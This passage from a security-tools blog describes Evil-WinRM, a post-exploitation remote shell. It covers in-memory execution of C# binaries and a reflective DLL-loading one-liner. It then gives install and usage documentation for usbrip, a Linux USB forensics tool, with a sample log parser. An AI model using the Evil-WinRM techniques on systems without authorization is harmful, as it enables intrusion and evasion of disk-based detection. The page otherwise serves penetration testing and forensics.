<ul style="text-align: left;">
<li><b>upload: </b>local files can be auto-completed using the tab key. It is not needed to put a remote_path if the local file is in the same directory as the evil-winrm.rb file.<br />
<b>usage: </b><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">upload local_path remote_path</span></li>
<li><b>download: </b>it is not needed to set local_path if the remote file is in the current directory.<br />
<b>usage: </b><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">download remote_path local_path</span></li>
<li><b>services: </b>list all services. No administrator permissions needed.</li>
<li><b>menu: </b>load the Invoke-Binary and l04d3r-LoadDll functions that are explained below. When a ps1 is loaded, all its functions will be shown.</li>
</ul>
<h3 style="text-align: left;">
<span style="color: #073763;">Load powershell scripts</span></h3>
To load a ps1 file you just have to type its name (auto-completion using tab is allowed). The scripts must be in the path set by the -s argument. Type menu again to see the loaded functions.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiJGtKO0GDFpcq5R7yVsvQ8D1lEnYO2BpjqbUW0Qvb0npjfILlzb6inJz_00d1eVVzdwo8t3EJe5MvckSiUkq1y96sRd_2cqAZxnoukp5wqNTD4kcqXxqJ7oyJoOhpHsppDBNpdWwgXp2i/s1600/Evil+WinRM+Screenshot1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="632" data-original-width="590" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiJGtKO0GDFpcq5R7yVsvQ8D1lEnYO2BpjqbUW0Qvb0npjfILlzb6inJz_00d1eVVzdwo8t3EJe5MvckSiUkq1y96sRd_2cqAZxnoukp5wqNTD4kcqXxqJ7oyJoOhpHsppDBNpdWwgXp2i/s1600/Evil+WinRM+Screenshot1.png" /></a></div>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Advanced commands</span></h3>
<b>Invoke-Binary:</b> allows exes compiled from C# to be executed in memory. The name can be auto-completed using the tab key, and up to 3 parameters are allowed. The executables must be in the path set by the -e argument.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHUOIBavPAl9Kj9BMqx0SS9GQ6mnJO9DtrzFxIiEjOZDAVEVaW2XANRaYEKL-K4PCWEFuuIQpJN754dfgPmXijIYXSbdVssDoGzbUeX7dU0c2q_Xu0hEbDXyNQ_z661U7WkamgD2Fkl3eH/s1600/Evil+WinRM+Advance+Commands+Screenshot.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="359" data-original-width="1055" height="217" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHUOIBavPAl9Kj9BMqx0SS9GQ6mnJO9DtrzFxIiEjOZDAVEVaW2XANRaYEKL-K4PCWEFuuIQpJN754dfgPmXijIYXSbdVssDoGzbUeX7dU0c2q_Xu0hEbDXyNQ_z661U7WkamgD2Fkl3eH/s640/Evil+WinRM+Advance+Commands+Screenshot.png" width="640" /></a></div>
<br />
<br />
<b>l04d3r-LoadDll: </b>allows loading dll libraries in memory, it is equivalent to: <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">[Reflection.Assembly]::Load([IO.File]::ReadAllBytes("pwn.dll"))</span><br />
<br />
The DLL file can be hosted over SMB, HTTP or locally. Once it is loaded, type menu; it is then possible to autocomplete all its functions.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVem8psaHDZUq_Kz-ovpSwmJSFCVIVpwMUiDZoJXtQkdoyllOkXkbShqJ_KwI4rRRLwoGbe383cnjIzERH3f9ifRsyyDg3Cwwnxbc1WbIKrQpXqn1p91zV0Ikmos8VTtlTmBKSwxAMngVh/s1600/Evil+WinRM+Loader.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="420" data-original-width="913" height="293" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVem8psaHDZUq_Kz-ovpSwmJSFCVIVpwMUiDZoJXtQkdoyllOkXkbShqJ_KwI4rRRLwoGbe383cnjIzERH3f9ifRsyyDg3Cwwnxbc1WbIKrQpXqn1p91zV0Ikmos8VTtlTmBKSwxAMngVh/s640/Evil+WinRM+Loader.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZU_pjga6wycTzH9a4Csmel21PwWaY_P7rUrdcwBEsOva7vnyv2zbDRmcg81mcZEZuWVBr-cdm-qxz5mhE3KdJ9mdSJJdF_sZjK6cYVM_Vb7Uv5bCO_ajJRZhQgMXuw7knc413Wh_tPLrK/s1600/Evil+WinRM+Sharpsploit.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="741" data-original-width="1077" height="440" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZU_pjga6wycTzH9a4Csmel21PwWaY_P7rUrdcwBEsOva7vnyv2zbDRmcg81mcZEZuWVBr-cdm-qxz5mhE3KdJ9mdSJJdF_sZjK6cYVM_Vb7Uv5bCO_ajJRZhQgMXuw7knc413Wh_tPLrK/s640/Evil+WinRM+Sharpsploit.png" width="640" /></a></div>
<br />
<br />
<b>Extra features</b><br />
<b><br /></b>
To disable colors, modify the <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$colors_enabled</span> variable in the code and set it to false: <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$colors_enabled = false</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<br />
<h3 style="text-align: left;">
<span style="color: #0c343d; font-family: inherit;"><span style="background-color: white;">Disclaimer </span></span></h3>
<span style="background-color: white;"><i><span style="font-family: "trebuchet ms" , sans-serif;">Evil-WinRM should be used for authorized penetration testing and/or nonprofit educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own servers and/or with the server owner's permission.</span></i></span><br />
<br />
<span style="font-size: large;"><a href="https://github.com/Hackplayers/evil-winrm" target="_blank">Download Evil-WinRM</a></span></div>
USBRIP- Simple Command Live Forensic Tool For Tracking USB device (published 2019-07-29)<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZgIpfh9FOilehIBn8Z19VRikZGzBiULIkAENd0YfMLtW9YGZXTs_uBsMAvkd64kknyDV9jTwn9i7Jh1Ul1j_r590m_RY5qj7r4ll6VhvYIj-X-mzkibNU_ruRfhyDi1lVyxHL_2UAedOE/s1600/USBrip+Screenshot.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img alt="USBRIP- Simple Command Live Forensic Tool For Tracking USB device" border="0" data-original-height="717" data-original-width="1013" height="452" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZgIpfh9FOilehIBn8Z19VRikZGzBiULIkAENd0YfMLtW9YGZXTs_uBsMAvkd64kknyDV9jTwn9i7Jh1Ul1j_r590m_RY5qj7r4ll6VhvYIj-X-mzkibNU_ruRfhyDi1lVyxHL_2UAedOE/s640/USBrip+Screenshot.png" title="USBRIP- Simple Command Live Forensic Tool For Tracking USB device" width="640" /></a></div>
<h2 style="text-align: left;">
<span style="color: #073763;">Simple command line forensics tool for tracking USB device artifacts (history of USB events) on GNU/Linux.</span></h2>
<br />
<b>usbrip</b> (derived from "USB Ripper", not "USB R.I.P.") is an open source forensics tool with a CLI that lets you keep track of USB device artifacts (aka USB event history, "Connected" and "Disconnected" events) on Linux machines.<br />
<br />
usbrip is a small piece of software written in pure Python 3 (using some external modules though, see <a href="https://github.com/snovvcrash/usbrip#pip-packages" target="_blank">Dependencies/PIP</a>) which parses Linux log files (<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/var/log/syslog*</span> or <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/var/log/messages*</span> depending on the distro) to construct USB event history tables. Such tables may contain the following columns: "Connected" (date &amp; time), "User", "VID" (vendor ID), "PID" (product ID), "Product", "Manufacturer", "Serial Number", "Port" and "Disconnected" (date &amp; time).<br />
<b><br /></b>
<b><span style="color: #073763;">Besides, it also can:</span></b><br />
<ul style="text-align: left;">
<li>export gathered information as a JSON dump (and open such dumps, of course);</li>
<li>generate a list of authorized (trusted) USB devices as a JSON (call it auth.json);</li>
<li>search for "violation events" based on the auth.json: show (or generate another JSON with) USB devices that do appear in history and do NOT appear in the auth.json;</li>
<li>when installed with the -s flag, create encrypted storages (7zip archives) to automatically back up and accumulate USB events with the help of the crontab scheduler;</li>
<li>search additional details about a specific USB device based on its VID and/or PID.</li>
</ul>
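The log parsing described above and the auth.json comparison from the list, as an added example that is not usbrip's own code: it builds the event table from constructed syslog lines and flags devices missing from a constructed trusted list. The regexes, the sample log and the trusted-list shape are assumptions.

```python
import re
from typing import Dict, List, Optional

# Added example, not usbrip code: syslog parsing plus the auth.json comparison,
# run over constructed log lines. Like usbrip it relies on the unmodified kernel
# message format and on year-less syslog timestamps.

# "Jul 29 12:01:33 host kernel: [ 1234.567890] usb 1-1: <message>"
# (root hubs log as "usb usb1:" and do not match the numeric port pattern)
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ kernel: "
    r"(?:\[\s*\d+\.\d+\] )?usb (?P<port>[\d.-]+): (?P<msg>.*)$"
)
FOUND_RE = re.compile(
    r"^New USB device found, idVendor=(?P<vid>[0-9a-f]{4}), idProduct=(?P<pid>[0-9a-f]{4})"
)
FIELD_RES = {  # descriptor strings that follow the 'found' line on the same port
    "product": re.compile(r"^Product: (.+)$"),
    "manufacturer": re.compile(r"^Manufacturer: (.+)$"),
    "serial": re.compile(r"^SerialNumber: (.+)$"),
}
DISCONNECT_RE = re.compile(r"^USB disconnect, device number \d+")
Event = Dict[str, Optional[str]]


def parse_usb_events(lines: List[str]) -> List[Event]:
    """Build the Connected/Disconnected event table from raw syslog lines."""
    events: List[Event] = []
    open_by_port: Dict[str, Event] = {}  # devices currently plugged in, by port
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, port, msg = m.group("ts"), m.group("port"), m.group("msg")
        found = FOUND_RE.match(msg)
        if found:
            # New device on this port. If the previous one never logged a
            # disconnect (rotated log, crash) it simply stays open-ended.
            ev: Event = {"connected": ts, "port": port, "vid": found["vid"],
                         "pid": found["pid"], "product": None, "manufacturer": None,
                         "serial": None, "disconnected": None}
            events.append(ev)
            open_by_port[port] = ev
        elif DISCONNECT_RE.match(msg):
            done = open_by_port.pop(port, None)
            if done is not None:
                done["disconnected"] = ts
        elif port in open_by_port:
            for key, rx in FIELD_RES.items():
                fm = rx.match(msg)
                if fm:
                    open_by_port[port][key] = fm.group(1)
    return events


def find_violations(events: List[Event], authorized: List[Dict[str, str]]) -> List[Event]:
    """Events for devices absent from the trusted list (the auth.json idea).

    A trusted entry matches on VID and PID; when it carries a serial number the
    serial must match too, so a look-alike device with another serial is flagged.
    """
    def trusted(ev: Event) -> bool:
        return any(a["vid"] == ev["vid"] and a["pid"] == ev["pid"]
                   and (a.get("serial") is None or a["serial"] == ev["serial"])
                   for a in authorized)
    return [ev for ev in events if not trusted(ev)]


# Constructed sample: a SanDisk stick that is plugged in and removed, then an
# unknown HID device without a serial number that is still connected.
SAMPLE_SYSLOG = """\
Jul 29 12:01:33 lab-host kernel: [ 1234.567890] usb 1-1: new high-speed USB device number 3 using xhci_hcd
Jul 29 12:01:33 lab-host kernel: [ 1234.700000] usb 1-1: New USB device found, idVendor=0781, idProduct=5567, bcdDevice= 1.00
Jul 29 12:01:33 lab-host kernel: [ 1234.700100] usb 1-1: New USB device strings: Mfr=1, Product=2, SerialNumber=3
Jul 29 12:01:33 lab-host kernel: [ 1234.700200] usb 1-1: Product: Cruzer Blade
Jul 29 12:01:33 lab-host kernel: [ 1234.700300] usb 1-1: Manufacturer: SanDisk
Jul 29 12:01:33 lab-host kernel: [ 1234.700400] usb 1-1: SerialNumber: 4C530001230304111234
Jul 29 12:05:10 lab-host kernel: [ 1451.000000] usb 1-1: USB disconnect, device number 3
Jul 29 13:10:02 lab-host kernel: [ 5343.100000] usb 1-2: new full-speed USB device number 4 using xhci_hcd
Jul 29 13:10:02 lab-host kernel: [ 5343.200000] usb 1-2: New USB device found, idVendor=1234, idProduct=abcd, bcdDevice= 1.00
Jul 29 13:10:02 lab-host kernel: [ 5343.200100] usb 1-2: New USB device strings: Mfr=1, Product=2, SerialNumber=0
Jul 29 13:10:02 lab-host kernel: [ 5343.200200] usb 1-2: Product: Example HID
Jul 29 13:10:02 lab-host kernel: [ 5343.200300] usb 1-2: Manufacturer: Example Corp
"""
# Constructed trusted list in the spirit of auth.json (VID/PID, optional serial).
AUTHORIZED = [{"vid": "0781", "pid": "5567", "serial": "4C530001230304111234"}]

if __name__ == "__main__":
    table = parse_usb_events(SAMPLE_SYSLOG.splitlines())
    for ev in table:
        print(f"{ev['connected']}  port {ev['port']}  {ev['vid']}:{ev['pid']}  "
              f"{ev['manufacturer']} {ev['product']}  sn={ev['serial']}  "
              f"disconnected={ev['disconnected']}")
    for ev in find_violations(table, AUTHORIZED):
        print(f"VIOLATION: {ev['vid']}:{ev['pid']} on port {ev['port']} at {ev['connected']}")
```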
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Quick Start</span></h3>
usbrip is available for download and installation at <a href="https://pypi.org/project/usbrip/" target="_blank">PyPI</a>:<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ pip3 install usbrip</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKgEMnIHZb1A08vNcWex-Tx5KR5aDO13cJ__gzDDcbbtDcj4zQgsP54WQOCg7wcAZ8GYIwd5pgmbN0_xmGexRAAnofnkBSfQ_099dPa3GMUjffQ8NLhyphenhyphenPCzE77k5JOTRYEBNWy9ZRX6yH9/s1600/USBrip+Screenshot1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="449" data-original-width="499" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKgEMnIHZb1A08vNcWex-Tx5KR5aDO13cJ__gzDDcbbtDcj4zQgsP54WQOCg7wcAZ8GYIwd5pgmbN0_xmGexRAAnofnkBSfQ_099dPa3GMUjffQ8NLhyphenhyphenPCzE77k5JOTRYEBNWy9ZRX6yH9/s1600/USBrip+Screenshot1.png" /></a></div>
<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Git Clone</span></h3>
For simplicity, let's agree that all commands prefixed with ~/usbrip$ are executed in the ~/usbrip directory, which is created by the git clone:<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">~$ git clone https://github.com/snovvcrash/usbrip.git usbrip && cd usbrip</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">~/usbrip$</span><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Dependencies</span></h3>
usbrip works only with the unmodified structure of the system log files, so unfortunately it won't be able to parse USB history if you change the syslog format (with <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">syslog-ng</span> or <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">rsyslog</span>, for example). That is also why the "Connected" and "Disconnected" timestamps don't include the year. Keep that in mind.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">DEB Packages</span></h3>
<ul style="text-align: left;">
<li>python3.6 (or newer) interpreter</li>
<li>python3-venv</li>
<li>p7zip-full (used by storages module)</li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">~$ sudo apt install -y python3-venv p7zip-full</span></li>
</ul>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">PIP Packages</span></h3>
<b>usbrip makes use of the following external</b> <b>modules:</b><br />
<ul style="text-align: left;">
<li>terminaltables</li>
<li>termcolor</li>
</ul>
<br />
To resolve Python dependencies manually (it's not necessary actually because pip or setup.py can automate the process, see Installation) create a virtual environment (optional) and run pip from within:<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">~/usbrip$ python3 -m venv venv && source venv/bin/activate</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">(venv) ~/usbrip$ pip install -r requirements.txt</span><br />
<br />
<b>Or let the pipenv one-liner do all the dirty work for you:</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">~/usbrip$ pipenv install && pipenv shell</span><br />
<br />
<b>After that you can run usbrip portably:</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">(venv) ~/usbrip$ python -m usbrip -h</span><br />
or<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">(venv) ~/usbrip$ python __main__.py -h</span><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Installation</span></h3>
There are two ways to install usbrip into the system: pip or setup.py.<br />
<br />
<b><span style="color: #073763;">pip or setup.py</span></b><br />
<br />
First of all, usbrip is pip installable. This means that after git cloning the repo you can simply fire up the pip installation process and after that run usbrip from anywhere in your terminal like so:<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">~/usbrip$ python3 -m venv venv && source venv/bin/activate</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">(venv) ~/usbrip$ pip install .</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">(venv) ~/usbrip$ usbrip -h</span><br />
<br />
Or if you want to resolve Python dependencies locally (without bothering PyPI), use setup.py:<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">~/usbrip$ python3 -m venv venv && source venv/bin/activate</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">(venv) ~/usbrip$ python setup.py install</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">(venv) ~/usbrip$ usbrip -h</span><br />
<br />
Note: you will most likely want to run the installation while the Python virtual environment is active (as shown above).<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">install.sh</span></h3>
Secondly, usbrip can also be installed into the system with the ./installers/install.sh script.<br />
<br />
When using the ./installers/install.sh some extra features become available:<br />
<ul style="text-align: left;">
<li>the virtual environment is created automatically;</li>
<li>the storage module becomes available: you can set up a cron job to back up USB events on a schedule (an example crontab entry is in usbrip/cron/usbrip.cron).</li>
</ul>
<br />
<i><span style="font-family: "trebuchet ms" , sans-serif;"><b>Warning:</b> if you use crontab scheduling, configure the job with </span><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">sudo crontab -e</span><span style="font-family: "trebuchet ms" , sans-serif;"> so that the storage update submodule runs as root and the passwords of the USB event storages stay out of reach of unprivileged users. The storage passwords are kept in </span><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/var/opt/usbrip/usbrip.ini</span><span style="font-family: "trebuchet ms" , sans-serif;">.</span></i><br />
<br />
The ./installers/uninstall.sh script removes all the installation artifacts from your system.<br />
<br />
<b>To install usbrip use:</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">~/usbrip$ chmod +x ./installers/install.sh</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">~/usbrip$ sudo -H ./installers/install.sh [-l/--local] [-s/--storages]</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">~/usbrip$ cd</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">~$ usbrip -h</span><br />
<br />
<ul style="text-align: left;">
<li>When <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-l </span>switch is enabled, Python dependencies are resolved from local .tar packages (<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">./3rdPartyTools/</span>) instead of PyPI.</li>
<li>When <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-s</span> switch is enabled, not only the usbrip project is installed, but also the list of trusted USB devices, history and violations storages are created.</li>
</ul>
<br />
<b>Note: </b>when using the -s option during installation, make sure that the system logs contain at least one external USB device entry. That is a necessary condition for usbrip to create the list of trusted devices (and, as a result, the violations storage).<br />
<br />
After the installation completes, feel free to remove the usbrip folder.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Paths</span></h3>
<b>When installed, the usbrip uses the following paths:</b><br />
<ul style="text-align: left;">
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/opt/usbrip/ —</span> project's main directory;</li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/var/opt/usbrip/usbrip.ini —</span> usbrip configuration file: keeps passwords for 7zip storages;</li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/var/opt/usbrip/storage/ — </span>USB event storages: history.7z and violations.7z (created during the installation process);</li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/var/opt/usbrip/log/ — </span>usbrip logs (recommended to log usbrip activity when using crontab, see usbrip/cron/usbrip.cron);</li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/var/opt/usbrip/trusted/ —</span> list of trusted USB devices (created during the installation process);</li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/usr/local/bin/usbrip — </span>symlink to the /opt/usbrip/venv/bin/usbrip script.</li>
</ul>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">cron</span></h3>
<b>Cron jobs can be set as follows:</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">~/usbrip$ sudo crontab -l > tmpcron && echo "" >> tmpcron</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">~/usbrip$ cat usbrip/cron/usbrip.cron | tee -a tmpcron</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">~/usbrip$ sudo crontab tmpcron</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">~/usbrip$ rm tmpcron</span><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">uninstall.sh</span></h3>
<b>To uninstall usbrip use:</b><br />
<br />
<span style="background-color: #eeeeee; color: #274e13; font-family: "courier new" , "courier" , monospace;">~/usbrip$ chmod +x ./installers/uninstall.sh</span><br />
<span style="background-color: #eeeeee; color: #274e13; font-family: "courier new" , "courier" , monospace;">~/usbrip$ sudo ./installers/uninstall.sh [-a/--all]</span><br />
<br />
When -a switch is enabled, not only the usbrip project directory is deleted, but also all the storages and usbrip logs are deleted too.<br />
<br />
And don't forget to remove the cron job.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Usage</span></h3>
<b>Synopsis</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"># ---------- BANNER ----------</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip banner</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Get usbrip banner.</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"># ---------- EVENTS ----------</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip events history [-t | -l] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-c <COLUMN> [<COLUMN> ...]] [-f <FILE> [<FILE> ...]] [-q] [--debug]</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Get USB event history.</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip events open <DUMP.JSON> [-t | -l] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-c <COLUMN> [<COLUMN> ...]] [-f <FILE> [<FILE> ...]] [-q] [--debug]</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Open USB event dump.</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip events gen_auth <OUT_AUTH.JSON> [-a <ATTRIBUTE> [<ATTRIBUTE> ...]] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-f <FILE> [<FILE> ...]] [-q] [--debug]</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Generate a list of trusted (authorized) USB devices.</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip events violations <IN_AUTH.JSON> [-a <ATTRIBUTE> [<ATTRIBUTE> ...]] [-t | -l] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-c <COLUMN> [<COLUMN> ...]] [-f <FILE> [<FILE> ...]] [-q] [--debug]</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Get USB violation events based on the list of trusted devices.</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"># ---------- STORAGE ----------</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip storage list <STORAGE_TYPE> [-q] [--debug]</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">List contents of the selected storage (7zip archive). STORAGE_TYPE is "history" or "violations".</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">$ usbrip storage open <STORAGE_TYPE> [-t | -l] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-c <COLUMN> [<COLUMN> ...]] [-q] [--debug]</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Open selected storage (7zip archive). Behaves similarly to the EVENTS OPEN submodule.</span><br />
